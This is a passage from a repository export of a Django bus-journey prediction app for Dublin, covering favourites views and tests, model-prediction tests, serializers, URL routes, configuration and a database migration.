-10,\n 'origin_name': 'Dorset Street Lower, stop 14',\n 'origin_lat': 53.358531237878196,\n 'origin_lon': -6.2627765057086595,\n 'destin_name': 'Parnell Square West, stop 3',\n 'destin_lat': 53.352308551434895,\n 'destin_lon': -6.26381074216821,\n 'stops': 1\n }\n response = self.client.post(reverse('addFavourite'), json.dumps(bad_favourite), content_type=\"json\")\n data = json.loads(response.content)\n\n # Check error message\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR unable to save new favourite.\")\n\n # Check new favourite is not created\n self.assertEqual(favourite.objects.all().count(), 1)\n\n def test_addFavourite_wrongFormat(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n bad_favourite = {\n \"username\": self.demo_user.username,\n \"password\": \"wrong password\"\n }\n response = self.client.post(reverse('addFavourite'), json.dumps(bad_favourite), content_type=\"json\")\n data = json.loads(response.content)\n\n # Check error message\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR unable to save new favourite.\")\n\n # Check new favourite is not created\n self.assertEqual(favourite.objects.all().count(), 1)\n\n def test_addFavourite_notJson(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n bad_favourite 
= {\n 'user': self.demo_user.pk,\n 'origin_name': 'Dorset Street Lower, stop 14',\n 'origin_lat': 53.358531237878196,\n 'origin_lon': -6.2627765057086595,\n 'destin_name': 'Parnell Square West, stop 3',\n 'destin_lat': 53.352308551434895,\n 'destin_lon': -6.26381074216821,\n 'stops': 1\n }\n response = self.client.post(reverse('addFavourite'), bad_favourite)\n data = json.loads(response.content)\n\n # Check error message\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR input not in JSON format.\")\n\n # Check new favourite is not created\n self.assertEqual(favourite.objects.all().count(), 1)\n\n def test_addFavourite_duplicate(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n bad_favourite = {\n 'user': self.demo_user.pk,\n 'origin_name': self.demo_favourite.origin_name,\n 'origin_lat': self.demo_favourite.origin_lat,\n 'origin_lon': self.demo_favourite.origin_lon,\n 'destin_name': self.demo_favourite.destin_name,\n 'destin_lat': self.demo_favourite.destin_lat,\n 'destin_lon': self.demo_favourite.destin_lon,\n 'stops': self.demo_favourite.stops\n }\n response = self.client.post(reverse('addFavourite'), json.dumps(bad_favourite), content_type=\"json\")\n data = json.loads(response.content)\n\n # Check error message\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR Duplicate favourite already exists.\")\n\n # Check new favourite is not created\n self.assertEqual(favourite.objects.all().count(), 1)\n\n \"\"\"========================= Testing removeFavourites view =========================\"\"\"\n\n def test_removeFavourite_GET(self):\n response = self.client.get(reverse('removeFavourite'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n def test_removeFavourite_loggedin_GET(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n response = self.client.get(reverse('removeFavourite'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('index'))\n\n def test_removeFavourite(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n data = {'id': self.demo_favourite.pk}\n response = self.client.post(reverse('removeFavourite'), json.dumps(data), content_type=\"json\")\n data = json.loads(response.content)\n\n self.assertEquals(data['success'], True)\n self.assertEquals(data['result'], \"Favourite dropped.\")\n\n self.assertEqual(favourite.objects.all().count(), 0)\n\n def test_removeFavourite_fail(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n data = {'id': -10}\n response = self.client.post(reverse('removeFavourite'), json.dumps(data), content_type=\"json\")\n data = json.loads(response.content)\n\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR could not delete.\")\n self.assertEqual(favourite.objects.all().count(), 1)\n\n def test_removeFavourite_wrongFormat(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n data = {'testkey': \"testvalue\"}\n response = self.client.post(reverse('removeFavourite'), json.dumps(data), content_type=\"json\")\n data = json.loads(response.content)\n\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR 
could not delete.\")\n self.assertEqual(favourite.objects.all().count(), 1)\n\n \"\"\"========================= Testing renameFavourites view =========================\"\"\"\n\n # Not logged in GET\n def test_renameFavourite_GET(self):\n response = self.client.get(reverse('renameFavourite'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('login'))\n\n # Logged in Get\n\n def test_renameFavourite_loggedin_GET(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n response = self.client.get(reverse('renameFavourite'), follow=True)\n redirect_path = response.request.get(\"PATH_INFO\")\n\n self.assertEquals(response.status_code, 200)\n self.assertEquals(redirect_path, reverse('index'))\n\n def test_renameFavourite(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n data = {\n 'id': self.demo_favourite.pk,\n 'new_name': 'New_Name'\n }\n response = self.client.post(reverse('renameFavourite'), json.dumps(data), content_type=\"json\")\n data = json.loads(response.content)\n\n self.assertEquals(data['success'], True)\n self.assertEquals(data['result'], \"Rename successful.\")\n self.assertEquals(data['name'], 'New_Name')\n\n def test_renameFavourite_fail(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n data = {\n 'id': -10,\n 'new_name': 'New_Name'\n }\n response = self.client.post(reverse('renameFavourite'), json.dumps(data), content_type=\"json\")\n data = json.loads(response.content)\n\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR could not rename.\")\n\n def test_renameFavourite_wrongFormat(self):\n self.client.login(username=self.demo_user.username, password=self.demo_passwd)\n data = {'testkey': \"testvalue\"}\n response = self.client.post(reverse('renameFavourite'), json.dumps(data), content_type=\"json\")\n data = json.loads(response.content)\n\n self.assertEquals(data['success'], False)\n self.assertEquals(data['result'], \"ERROR could not rename.\")\n" }, { "alpha_fraction": 0.5199999809265137, "alphanum_fraction": 0.7163636088371277, "avg_line_length": 17.399999618530273, "blob_id": "da3da15eae01316ae11d07ffd9a49b7ac417e64a", "content_id": "bd3e7ef255bbeaa71c3776090e1e912c7e559feb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 275, "license_type": "no_license", "max_line_length": 27, "num_lines": 15, "path": "/requirements.txt", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "PyMySQL==1.0.2\nholidays==0.11.1\nxgboost~=1.3.3\nrequests==2.25.1\npandas~=1.2.5\nDjango==3.2.5\nnumpy~=1.20.2\nscikit_learn==0.24.2\ndjangorestframework==3.12.4\ndjango-debug-toolbar==3.2.1\nsetuptools~=52.0.0\nscikit-learn~=0.24.2\ndjango-environ==0.4.5\ndateparser==1.0.0\npytz==2021.1" }, { "alpha_fraction": 0.5127931833267212, "alphanum_fraction": 0.5634812712669373, "avg_line_length": 58.298851013183594, "blob_id": "3aa7d1d20bd220ea1688ad1f0795a867de4d5704", "content_id": "e40d02c4ae391d65e781723430419acf3c0e4c49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10318, "license_type": "no_license", "max_line_length": 204, "num_lines": 174, "path": "/Dublin_Bus/tests/test_busmodels.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom 
Bus.busmodels import get_current_weather, create_weather_df, get_future_weather, encode_time_features, \\\n encode_features, get_stop_num, get_stop_num_lat_lng, find_route, read_json, get_proportion_of_route, \\\n get_percentage_of_route_by_stops, get_prediction\nfrom Bus.models import CurrentWeather, WeatherPrediction, Stop\nfrom datetime import datetime\nfrom pandas.testing import assert_frame_equal\nimport pandas as pd\nfrom unittest import mock\nimport json\n\n\nclass TestBusmodels(TestCase):\n\n def setUp(self):\n curr_weather_obj = CurrentWeather(dt=1629104293, temp=15.89, feels_like=15.7, temp_min=12.6, temp_max=19.73,\n humidity=83, wind_speed=1.34, weather_main=\"Haze\", weather_description=\"haze\",\n weather_icon=\"50n\")\n curr_weather_obj.save()\n future_weather_obj = WeatherPrediction(dt=1629104294, temp=16.89, feels_like=16.7, temp_min=6.6, temp_max=25.73,\n humidity=65, wind_speed=1.23, weather_main=\"Rain\",\n weather_description=\"light rain\", weather_icon=\"10d\")\n future_weather_obj.save()\n stop = Stop(stop_id='8220DB000004', stop_name='Parnell Square West, stop 2', stop_lat=53.3522443611407,\n stop_lon=-6.263723218918821)\n stop2 = Stop(stop_id='8220DB000757', stop_name='Donnybrook Village, stop 757', stop_lat=53.324081337159,\n stop_lon=-6.239586509859331)\n stop.save()\n stop2.save()\n self.curr_weather_obj = curr_weather_obj\n self.future_weather_obj = future_weather_obj\n self.stop = stop\n self.stop2 = stop2\n return super().setUp()\n\n \"\"\"========================= Testing functions that encode df for model =========================\"\"\"\n\n def test_create_weather_df(self):\n df = create_weather_df(self.curr_weather_obj)\n df_future = create_weather_df(self.future_weather_obj)\n self.assertEqual(df.columns.values.tolist(), df_future.columns.values.tolist())\n\n def test_encode_time_features(self):\n new_year = datetime(2021, 1, 1, 0, 1, 5)\n result = encode_time_features(new_year)\n self.assertEqual(result, [[65, 4, '2021-01-01', 0]])\n\n def test_encode_features(self):\n new_year = datetime(2021, 1, 1, 0, 1, 5)\n df = encode_features(new_year)\n test_data = {'actualtime_dep': 65, 'is_term': 0, 'is_holiday': 1, 'is_rush_hour': 0, 'weekday_1': 0,\n 'weekday_2': 0, 'weekday_3': 0, 'weekday_4': 1, 'weekday_5': 0, 'weekday_6': 0}\n test_df = pd.DataFrame([test_data])\n assert_frame_equal(df, test_df, check_dtype=False)\n\n \"\"\"========================= Testing get_stop_num & get_stop_num_lat_lng =========================\"\"\"\n\n def test_get_stop_num(self):\n result_int_false = get_stop_num(self.stop.stop_lat, self.stop.stop_lon, self.stop.stop_name, integer=False)\n result_int_true = get_stop_num(self.stop.stop_lat, self.stop.stop_lon, self.stop.stop_name, integer=True)\n if len(result_int_false) != 0:\n self.assertIsInstance(result_int_false[0], str)\n self.assertRegex(self.stop.stop_name, result_int_false[0])\n if len(result_int_true) != 0:\n self.assertIsInstance(result_int_true[0], int)\n self.assertIsInstance(result_int_false, list)\n self.assertIsInstance(result_int_true, list)\n\n def test_get_stop_num_lat_lng(self):\n res_int_false = get_stop_num_lat_lng(self.stop.stop_lat, self.stop.stop_lon, integer=False)\n res_int_true = get_stop_num_lat_lng(self.stop.stop_lat, self.stop.stop_lon, integer=True)\n if len(res_int_false) != 0:\n self.assertIsInstance(res_int_false[0], str)\n self.assertRegex(self.stop.stop_name, res_int_false[0])\n if len(res_int_true) != 0:\n self.assertIsInstance(res_int_true[0], int)\n\n \"\"\"========================= Testing 
find_route =========================\"\"\"\n\n def test_find_route(self):\n res = find_route(self.stop.stop_lat, self.stop.stop_lon, self.stop2.stop_lat, self.stop2.stop_lon,\n self.stop2.stop_name, self.stop.stop_name, '46A')\n self.assertNotEqual(res, None)\n self.assertEqual(res, '46A_67')\n\n \"\"\"========================= Testing read_json =========================\"\"\"\n\n def test_read_json(self):\n data = [{\"stoppointid\": 226, \"mean_tt_rush_hour%\": 0.0, \"progrnumber\": 1, \"mean_tt%\": 0.0},\n {\"stoppointid\": 228, \"mean_tt_rush_hour%\": 1.2144524647, \"progrnumber\": 2, \"mean_tt%\": 1.3419639823}]\n read_data = json.dumps(data)\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open):\n result = read_json('filename')\n self.assertEqual(data, result)\n\n \"\"\"========================= Testing proportion_of_route =========================\"\"\"\n\n def test_get_proportion_of_route_no_ave(self):\n mock_target = 'Bus.busmodels.get_percentage_of_route_by_stops'\n\n with mock.patch(mock_target, return_value=30):\n # test if we have no averages file will it deafult to get_proportion_of_route_by_stops?\n res_non_rush_hour = get_proportion_of_route('1111', 2, 3, self.stop.stop_lat, self.stop.stop_lon, self.stop2.stop_name, self.stop2.stop_lat, self.stop2.stop_lon)\n res_rush_hour = get_proportion_of_route('1111', 2, 3, self.stop.stop_lat, self.stop.stop_lon, self.stop2.stop_name, self.stop2.stop_lat, self.stop2.stop_lon, True)\n self.assertEqual(res_non_rush_hour, 30)\n self.assertEqual(res_rush_hour, 30)\n\n def test_get_proportion_of_route_with_ave(self):\n # test for when we do have historical averages\n # mock historical averages and patch check file exists\n mock_target = 'Bus.busmodels.check_file_exists'\n data = [{\"stoppointid\":381,\"mean_tt_rush_hour%\":0.0,\"progrnumber\":1,\"mean_tt%\":0.0},\n {\"stoppointid\":382,\"mean_tt_rush_hour%\":2,\"progrnumber\":2,\"mean_tt%\":1.5},\n {\"stoppointid\":3,\"mean_tt_rush_hour%\":2,\"progrnumber\":3,\"mean_tt%\":1.5},\n {\"stoppointid\":757,\"mean_tt_rush_hour%\":2,\"progrnumber\":4,\"mean_tt%\":1.5}]\n stop_num_mock_target = 'Bus.busmodels.get_stop_num'\n percentage_by_stops_mock = 'Bus.busmodels.get_percentage_of_route_by_stops'\n with mock.patch(mock_target, return_value=data):\n with mock.patch(stop_num_mock_target, side_effect=[[381], [757], [381], [757], [381], []]):\n with mock.patch(percentage_by_stops_mock, return_value=None):\n res = get_proportion_of_route('1111', self.stop.stop_name, 3, self.stop.stop_lat, self.stop.stop_lon, self.stop2.stop_name, self.stop2.stop_lat, self.stop2.stop_lon)\n res_rush_hour = get_proportion_of_route('1111', self.stop.stop_name, 3, self.stop.stop_lat, self.stop.stop_lon, self.stop2.stop_name, self.stop2.stop_lat, self.stop2.stop_lon, True)\n res_out_of_range = get_proportion_of_route('1111', self.stop.stop_name, 4, self.stop.stop_lat, self.stop.stop_lon, self.stop2.stop_name, self.stop2.stop_lat, self.stop2.stop_lon, True)\n self.assertEqual(res, 4.5 / 100)\n self.assertEqual(res_rush_hour, 6 / 100)\n self.assertEqual(res_out_of_range, None)\n\n \"\"\"========================= Testing get_prediction =========================\"\"\"\n\n def test_get_prediction_failure(self):\n # test it returns Google prediction in case of failure\n mock_target = 'Bus.busmodels.find_route'\n mock_API_response = {'departure_time': '2021-08-17T12:28:28.000Z', 'line': '27',\n 'departure_stop': 'Eden Quay, stop 298', 'arrival_stop': 'Portland Row', 'num_stops': 3,\n 
'dep_stop_lat': 53.3481866, 'dep_stop_lng': -6.2564106, 'arr_stop_lat': 53.353535,\n 'arr_stop_lng': -6.248092, 'google_pred': 228}\n\n with mock.patch(mock_target, return_value=None):\n res = get_prediction(mock_API_response)\n self.assertEqual(res, mock_API_response['google_pred'])\n\n def test_get_prediction(self):\n data = [1,2,3,4,5,6,7,8,9,10,11,12,13,14]\n df1 = pd.DataFrame({'actualtime_dep': [1],\n 'temp': [2],\n 'wind_speed': [3],\n 'humidity': [4],\n 'weather_main_precipitation':[5],\n 'is_term':[6],\n 'is_holiday':[7],\n 'is_rush_hour':[8],\n 'weekday_1':[9],\n 'weekday_2':[10],\n 'weekday_3':[11],\n 'weekday_4':[12],\n 'weekday_5':[13],\n 'weekday_6':[14]})\n df2 = pd.DataFrame()\n with mock.patch('Bus.busmodels.find_route', return_value='22'):\n with mock.patch('Bus.busmodels.change_timezone', return_value=datetime.now()):\n with mock.patch('Bus.busmodels.encode_features', return_value=df1):\n with mock.patch('Bus.busmodels.get_current_weather', return_value=df2):\n with mock.patch('Bus.busmodels.get_future_weather', return_value=df2):\n with mock.patch('Bus.busmodels.open_model_and_predict', return_value=120):\n with mock.patch('Bus.busmodels.is_rush_hour_or_not', return_value=.50):\n res = get_prediction({'departure_time': '2021-08-17T12:28:28.000Z', 'line': '27',\n 'departure_stop': 'Eden Quay, stop 298',\n 'arrival_stop': 'Portland Row', 'num_stops': 3,\n 'dep_stop_lat': 53.3481866, 'dep_stop_lng': -6.2564106,\n 'arr_stop_lat': 53.353535, 'arr_stop_lng': -6.248092,\n 'google_pred': 228})\n expected_res = json.dumps(str(1.0))\n self.assertEqual(res, expected_res)\n" }, { "alpha_fraction": 0.7151162624359131, "alphanum_fraction": 0.7151162624359131, "avg_line_length": 42, "blob_id": "2de07f7d065b44a684691df1390db89e66776d11", "content_id": "0092a5e38d520a485fe700ae9dc70c0f6d0c6e59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 516, "license_type": "no_license", "max_line_length": 77, "num_lines": 12, "path": "/Dublin_Bus/users/urls.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('login', views.loginPage, name='login'),\n path('register', views.registerPage, name='register'),\n path('logout', views.logoutUser, name='logout'),\n path('favourites', views.favourites, name='favourites'),\n path('favourites/add', views.addFavourite, name='addFavourite'),\n path('favourites/remove', views.removeFavourite, name='removeFavourite'),\n path('favourites/rename', views.renameFavourite, name='renameFavourite'),\n]\n" }, { "alpha_fraction": 0.634361207485199, "alphanum_fraction": 0.634361207485199, "avg_line_length": 27.375, "blob_id": "5bae8f0c5a1d0f302e682a00723d5a6285d89b7a", "content_id": "66dac386c58874f9b5304a481077809051accceb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 454, "license_type": "no_license", "max_line_length": 82, "num_lines": 16, "path": "/config/config.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "import os\n\n\nclass APIKeys:\n WEATHER_API_KEY = os.environ.get(\"WEATHER_API_KEY\")\n MAP_API_KEY = os.environ.get(\"MAP_API_KEY\")\n GTFS_API_KEY = os.environ.get(\"GFTS_API_KEY\")\n\n\nclass MySQL:\n host = os.getenv(\"DB_URI\")\n port = os.getenv(\"DB_PORT\")\n username = os.getenv(\"DB_USER\")\n password = os.getenv(\"DB_PASS\")\n database = os.getenv(\"DB_NAME\")\n URI = f'mysql+mysqlconnector://{username}:{password}@{host}:{port}/{database}'\n" }, { "alpha_fraction": 0.5148394703865051, "alphanum_fraction": 0.5996365547180176, "avg_line_length": 56.92982482910156, "blob_id": "64a60db5582a40e4601c3ca1f3c729971210f54e", "content_id": "9b14a3f6ccceac6be82a578ce5e42bfda0735e56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3302, "license_type": "no_license", "max_line_length": 120, "num_lines": 57, "path": "/Dublin_Bus/tests/test_serializers.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom Bus.models import StopTime, Trip, Stop, Route, Calendar\nfrom Bus.serializers import StopTimeSerializer\n\n\nclass TestSerializers(TestCase):\n \"\"\"========================= Testing serializer =========================\"\"\"\n\n def setUp(self):\n self.calendar = Calendar(service_id='y1008', monday=1, tuesday=0, wednesday=0, thursday=0, friday=0, saturday=0,\n sunday=1, start_date=20210725, end_date=20211016)\n self.calendar.save()\n self.route = Route(route_id='60-38A-d12-1', agency_id='978', route_short_name='38a', route_long_name=None,\n route_type=3)\n self.route.save()\n self.trip = Trip(route_id=self.route, service_id=self.calendar, trip_id='14773.y1008.60-38A-d12-1.179.O',\n shape_id='60-38A-d12-1.179.O', trip_headsign='Burlington Road (Mespil Road) - Damastown Drive',\n direction_id=0)\n self.trip.save()\n self.stop = Stop(stop_id='8220DB000004', stop_name='Parnell Square West, stop 2', stop_lat=53.3522443611407,\n stop_lon=-6.263723218918821)\n self.stop.save()\n self.stopTime = StopTime(id=1, trip_id=self.trip, arrival_time='17:47:37', stop_id=self.stop, stop_sequence=10,\n stop_headsign='Damastown')\n self.stopTime.save()\n\n self.calendar1 = Calendar(service_id='y1007', monday=1, tuesday=0, wednesday=0, thursday=0, friday=0,\n saturday=0, sunday=1, start_date=20210725, end_date=20211016)\n self.calendar1.save()\n self.route1 = Route(route_id='60-38A-d12-2', agency_id='978', route_short_name='38a', route_long_name=None,\n route_type=3)\n self.route1.save()\n self.trip1 = Trip(route_id=self.route1, 
service_id=self.calendar1, trip_id='14773.y1008.60-38A-d12-1.179.O1',\n shape_id='60-38A-d12-1.179.O',\n trip_headsign='Burlington Road (Mespil Road) - Damastown Drive', direction_id=0)\n self.trip1.save()\n self.stop1 = Stop(stop_id='8220DB000003', stop_name='Parnell Square West, stop 2', stop_lat=53.3522443611407,\n stop_lon=-6.263723218918821)\n self.stop1.save()\n self.stopTime1 = StopTime(id=2, trip_id=self.trip1, arrival_time='17:47:37', stop_id=self.stop1,\n stop_sequence=10, stop_headsign='Damastown')\n self.stopTime1.save()\n\n self.serializer = StopTimeSerializer([self.stopTime1, self.stopTime], many=True)\n return super().setUp()\n\n # check serializer contains correct fields both at outer and nested layers\n def test_contains_expected_fields(self):\n data = self.serializer.data\n self.assertCountEqual(data[0].keys(), ['arrival_time', 'stop_headsign', 'stop_id', 'stop_sequence', 'trip_id'])\n\n # check field content is what it should be at all nested layers\n def test_field_content(self):\n data = self.serializer.data\n self.assertEqual(data[0]['arrival_time'], '17:47:37')\n self.assertEqual(data[1]['stop_id']['stop_id'], '8220DB000004')\n self.assertEqual(data[0]['trip_id']['route_id']['route_short_name'], '38a')\n" }, { "alpha_fraction": 0.552992045879364, "alphanum_fraction": 0.5533525347709656, "avg_line_length": 35.98666763305664, "blob_id": "887b795cf975c4137e51f6b16229b86148839d4c", "content_id": "9c2897cd55aa6da81a854131d50375db8326c523", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5548, "license_type": "no_license", "max_line_length": 289, "num_lines": 150, "path": "/Dublin_Bus/users/views.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.contrib import auth\nfrom django.contrib.messages.api import error\nfrom django.http.response import JsonResponse\nfrom django.shortcuts import redirect, render\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.forms.models import model_to_dict\nfrom .models import favourite\nimport json\n\nfrom .forms import CreateUserForm\n\ndef registerPage(request):\n if request.user.is_authenticated:\n return redirect('index')\n else:\n form = CreateUserForm()\n\n #New user Registered\n if request.method == 'POST':\n form = CreateUserForm(request.POST)\n if not form.is_valid():\n error_dict = form.errors.as_data()\n field_list = list(error_dict.values())\n for error_list in field_list:\n for error in error_list:\n #Send form errors as messages\n messages.error(request, str(error)[2:-2])\n return redirect('register')\n else:\n form.save()\n user = form.cleaned_data.get('username')\n messages.success(request, 'Account created for ' + user + '.' 
)\n return redirect('login')\n \n context = {'form': form}\n return render(request, 'users/register.html', context)\n\ndef loginPage(request):\n if request.user.is_authenticated:\n return redirect('index')\n else:\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n\n user = authenticate(request, username= username, password=password)\n\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n messages.error(request, 'Username OR Password is incorrect.')\n return redirect('login')\n return render(request, 'users/login.html')\n\ndef logoutUser(request):\n logout(request)\n return redirect('login')\n\n@login_required(login_url='login')\ndef favourites(request):\n current_user = request.user\n favourites = favourite.objects.filter(user_id=current_user.id)\n context = {'favourites': favourites}\n return render(request, 'users/favourites.html', context)\n\n@login_required(login_url='login')\ndef addFavourite(request):\n if request.method == 'POST':\n try:\n data = json.loads(request.body)\n except:\n return_info = {\n 'success' : False,\n 'result' : \"ERROR input not in JSON format.\"\n }\n return JsonResponse(return_info)\n \n try:\n if favourite.objects.filter(user_id = data['user'], origin_lat = data['origin_lat'], origin_lon = data['origin_lon'], destin_lat = data['destin_lat'], destin_lon = data['destin_lon']).exists():\n return_info = {\n 'success' : False,\n 'result' : 'ERROR Duplicate favourite already exists.'\n }\n else:\n data['origin_name'] = data['origin_name'].replace('\"', '\\'')\n data['destin_name'] = data['destin_name'].replace('\"', '\\'')\n\n new_favourite = favourite(user_id = data['user'], origin_name= data['origin_name'], origin_lat = data['origin_lat'], origin_lon = data['origin_lon'], destin_name = data['destin_name'], destin_lat = data['destin_lat'], destin_lon = data['destin_lon'], stops = data['stops'])\n new_favourite.save()\n favourite_dict = model_to_dict(new_favourite)\n return_info = {\n 'success' : True,\n 'result' : \"Favourite added.\",\n 'favourite' : favourite_dict\n }\n except:\n return_info = {\n 'success' : False,\n 'result' : \"ERROR unable to save new favourite.\"\n }\n return JsonResponse(return_info)\n \n else:\n return redirect('index')\n\n@login_required(login_url='login')\ndef removeFavourite(request):\n if request.method == 'POST':\n try:\n data = json.loads(request.body)\n\n favourite.objects.get(pk=data['id']).delete()\n return_info = { \n 'success': True, \n 'result' : \"Favourite dropped.\"\n }\n except:\n return_info = { \n 'success': False,\n 'result' : \"ERROR could not delete.\"\n }\n return JsonResponse(return_info)\n else:\n return redirect('index')\n\n@login_required(login_url='login')\ndef renameFavourite(request):\n if request.method == 'POST':\n try:\n data = json.loads(request.body)\n renamed_favourite = favourite.objects.get(pk=data['id'])\n renamed_favourite.favourite_name = data['new_name'].replace('\"', '')\n renamed_favourite.save(update_fields=['favourite_name'])\n return_info = {\n 'success' : True,\n 'result' : \"Rename successful.\",\n 'name' : renamed_favourite.favourite_name\n }\n return JsonResponse(return_info)\n except:\n return_info = {\n 'success' : False,\n 'result' : \"ERROR could not rename.\"\n }\n return JsonResponse(return_info)\n else:\n return redirect('index')\n" }, { "alpha_fraction": 0.5203539729118347, "alphanum_fraction": 0.5274336338043213, "avg_line_length": 46.08333206176758, "blob_id": 
"4659624fb47d2f83212db32a6c8f0253a10dfbb4", "content_id": "36beb2a7bc51359b129e220c0c3e315774750514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6780, "license_type": "no_license", "max_line_length": 138, "num_lines": 144, "path": "/Dublin_Bus/Bus/migrations/0001_initial.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.5 on 2021-08-15 13:21\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Calendar',\n fields=[\n ('service_id', models.CharField(max_length=225, primary_key=True, serialize=False)),\n ('monday', models.IntegerField(blank=True, null=True)),\n ('tuesday', models.IntegerField(blank=True, null=True)),\n ('wednesday', models.IntegerField(blank=True, null=True)),\n ('thursday', models.IntegerField(blank=True, null=True)),\n ('friday', models.IntegerField(blank=True, null=True)),\n ('saturday', models.IntegerField(blank=True, null=True)),\n ('sunday', models.IntegerField(blank=True, null=True)),\n ('start_date', models.IntegerField(blank=True, null=True)),\n ('end_date', models.IntegerField(blank=True, null=True)),\n ],\n options={\n 'db_table': 'calendar',\n 'managed': True,\n },\n ),\n migrations.CreateModel(\n name='CurrentWeather',\n fields=[\n ('dt', models.IntegerField(primary_key=True, serialize=False)),\n ('temp', models.FloatField(blank=True, null=True)),\n ('feels_like', models.FloatField(blank=True, null=True)),\n ('temp_min', models.FloatField(blank=True, null=True)),\n ('temp_max', models.FloatField(blank=True, null=True)),\n ('humidity', models.FloatField(blank=True, null=True)),\n ('wind_speed', models.FloatField(blank=True, null=True)),\n ('weather_main', models.CharField(blank=True, max_length=30, null=True)),\n ('weather_description', models.CharField(blank=True, max_length=60, null=True)),\n ('weather_icon', models.CharField(blank=True, max_length=10, null=True)),\n ],\n options={\n 'db_table': 'current_weather',\n 'managed': True,\n },\n ),\n migrations.CreateModel(\n name='Route',\n fields=[\n ('route_id', models.CharField(max_length=100, primary_key=True, serialize=False)),\n ('agency_id', models.TextField(blank=True, null=True)),\n ('route_short_name', models.TextField(blank=True, null=True)),\n ('route_long_name', models.TextField(blank=True, null=True)),\n ('route_type', models.IntegerField(blank=True, null=True)),\n ],\n options={\n 'db_table': 'route',\n 'managed': True,\n },\n ),\n migrations.CreateModel(\n name='Stop',\n fields=[\n ('stop_id', models.CharField(max_length=100, primary_key=True, serialize=False)),\n ('stop_name', models.CharField(blank=True, max_length=225, null=True)),\n ('stop_lat', models.FloatField(blank=True, null=True)),\n ('stop_lon', models.FloatField(blank=True, null=True)),\n ],\n options={\n 'db_table': 'stops',\n 'managed': True,\n },\n ),\n migrations.CreateModel(\n name='WeatherPrediction',\n fields=[\n ('dt', models.IntegerField(primary_key=True, serialize=False)),\n ('temp', models.FloatField(blank=True, null=True)),\n ('feels_like', models.FloatField(blank=True, null=True)),\n ('temp_min', models.FloatField(blank=True, null=True)),\n ('temp_max', models.FloatField(blank=True, null=True)),\n ('humidity', models.FloatField(blank=True, null=True)),\n ('wind_speed', models.FloatField(blank=True, null=True)),\n ('weather_main', 
models.CharField(blank=True, max_length=30, null=True)),\n                ('weather_description', models.CharField(blank=True, max_length=60, null=True)),\n                ('weather_icon', models.CharField(blank=True, max_length=10, null=True)),\n            ],\n            options={\n                'db_table': 'weather_predictions',\n                'managed': True,\n            },\n        ),\n        migrations.CreateModel(\n            name='Trip',\n            fields=[\n                ('trip_id', models.CharField(max_length=225, primary_key=True, serialize=False)),\n                ('shape_id', models.CharField(max_length=225)),\n                ('trip_headsign', models.TextField(blank=True, null=True)),\n                ('direction_id', models.IntegerField(blank=True, null=True)),\n                ('route_id', models.ForeignKey(db_column='route_id', on_delete=django.db.models.deletion.CASCADE, to='Bus.route')),\n                ('service_id', models.ForeignKey(db_column='service_id', on_delete=django.db.models.deletion.CASCADE, to='Bus.calendar')),\n            ],\n            options={\n                'db_table': 'trips',\n                'managed': True,\n            },\n        ),\n        migrations.CreateModel(\n            name='StopTime',\n            fields=[\n                ('id', models.AutoField(db_column='id', primary_key=True, serialize=False)),\n                ('arrival_time', models.TextField()),\n                ('stop_sequence', models.IntegerField(blank=True, null=True)),\n                ('stop_headsign', models.CharField(blank=True, max_length=225, null=True)),\n                ('stop_id', models.ForeignKey(db_column='stop_id', 